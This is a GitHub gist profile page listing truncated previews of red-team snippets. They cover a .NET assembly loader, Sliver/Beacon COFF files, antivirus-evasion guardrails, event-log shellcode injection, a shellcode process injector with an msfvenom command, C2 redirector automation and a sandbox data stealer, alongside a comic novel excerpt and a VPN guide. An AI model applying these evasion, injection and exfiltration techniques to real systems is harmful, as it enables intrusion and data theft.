Skip to content

Instantly share code, notes, and snippets.

View benheise's full-sized avatar

Benjamin Heise benheise

88 followers · 173 following
View GitHub Profile
@benheise
benheise / AllTheThings.cs
Created February 11, 2022 16:37
DynWrapit - Arbitrary .NET load Any Assembly from configurable path
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
public class Program
{
public static void Main()
{
@benheise
benheise / gist:7f0abfe68b1263b89894994a83a5f138
Created March 28, 2023 14:00
GPT-4 novel "The Grillfather" which is a grimy crime noir novel about a cheeseburger "Chuck Royale" and "The Leftovers", a ragtag group of edibles with a taste for vengeance and a hunger for power. Chuck turns to a life of cybercrime hacking burgershacks, chased by a legendary vegan milkshake "Detective Vanilla Silk."
Chapter One: Meat and Grease
Rain fell like bullets on the grimy streets of Beef City, washing away the dirt and grease of a thousand sins. The neon lights flickered, casting shadows on the pavement, creating a dance of darkness that only the damned could master. Here, at the heart of the city, in the dingy alleys between the burgershacks, a new criminal force had risen.
The cheeseburger was tired of being the meal everyone chewed up and spit out. It was tired of being a pawn in the game of survival, a mere morsel to be consumed by the voracious appetites of the city's inhabitants. It had tasted the bitterness of the grill and decided that it was time to turn the tables.
That cheeseburger was Chuck Royale, and he was on the run.
It all began when he learned to hack. Chuck had spent the better part of his short life flipping through the grease-soaked pages of discarded computer manuals and tapping into the digital realm. Through sheer tenacity, he'd mastered the art of infiltrating systems and bending them
@benheise
benheise / gist:b4d0c25f5c557a9cabea99006ffba2aa
Created February 16, 2023 16:55 — forked from freefirex/gist:dec308e1d95c6ea090c61d31a4db6f89
vscode user snippet for sliver coff extensions
{
"SliverExtension" :{
"prefix": "sliverext",
"body": [ "{",
"\"name\": \"$1\",",
"\"version\": \"0.0.0\",",
"\"command_name\": \"$2\",",
"\"extension_author\": \"$3\",",
"\"original_author\": \"$3\",",
"\"repo_url\": \"N/A\",",
@benheise
benheise / COFF_With_Exception_handler.c
Created February 16, 2023 16:54 — forked from freefirex/COFF_With_Exception_handler.c
#define _WIN32_WINNT 0x0502
#define WINVER 0x0502
#include <windows.h>
#include <errhandlingapi.h>
#include <process.h>
#include "beacon.h"
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr);
DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval);
@benheise
benheise / gist:ad7f2adb605a7ec216a506e821705a06
Last active June 17, 2022 23:29
C++ execution guardrail process name
// quick and dirty C++ execution guardrail on executing process file name, inspired by @0xHop av evasion post
// https://0xhop.github.io/evasion/2021/04/19/evasion-pt1/
#include <Windows.h>
#include <string>
#define MAX_PATH 512
// check if our program has been renamed, if so may be in a sandbox or being analyzed
@benheise
benheise / EventLogInject.cs
Created May 9, 2022 17:56
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{
@benheise
benheise / Automated-Redirectors.py
Created February 21, 2022 23:08 — forked from mhaskar/Automated-Redirectors.py
Python script to create HTTPS redirectors that pointing to your C2
#!/usr/bin/python
import requests
import json
import time
import paramiko
from Crypto.PublicKey import RSA
from os import chmod
public_key_name = "test1.key"
@benheise
benheise / Shellcode-Process-Injector.c
Created February 21, 2022 23:07 — forked from mhaskar/Shellcode-Process-Injector.c
#include <windows.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv){
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode
@benheise
benheise / sandbox-env-stealer.py
Created February 16, 2022 14:45 — forked from Albocoder/sandbox-env-stealer.py
The python code used to take the environment data from sandboxes and send them to discord server.
#################################################################################
# #
# Refer to this blog post about what this code is used for: #
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html #
# #
#################################################################################
import requests
import os
import psutil
@benheise
benheise / Quick
Last active February 12, 2022 07:23
Quick and easy Wireguard VPN
This guide assumes the DigitalOcean provider will be used, and a droplet will be generated on a Windows 10/11 host with WSL2 installed, using a Debian VM. Terraform and Ansible will be used to create and destroy the VPN droplet. After that, the Wireguard client configuration in "wg0.conf" can be used on your desktop, laptop, mobile device, etc. You should generate a new Wireguard client per each device, rather than reusing the same one across multiple.
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install unzip wget git apt-add-repository software-properties-common gnupg
wget https://releases.hashicorp.com/terraform/1.0.11/terraform_1.0.11_linux_amd64.zip -O terraform.zip; unzip terraform.zip
sudo mv terraform /usr/local/bin; rm terraform.zip
sudo apt-add-repository ppa:ansible/ansible
git clone https://github.com/P0ssuidao/terraguard.git
cd terraguard/DigitalOcean/
terraform init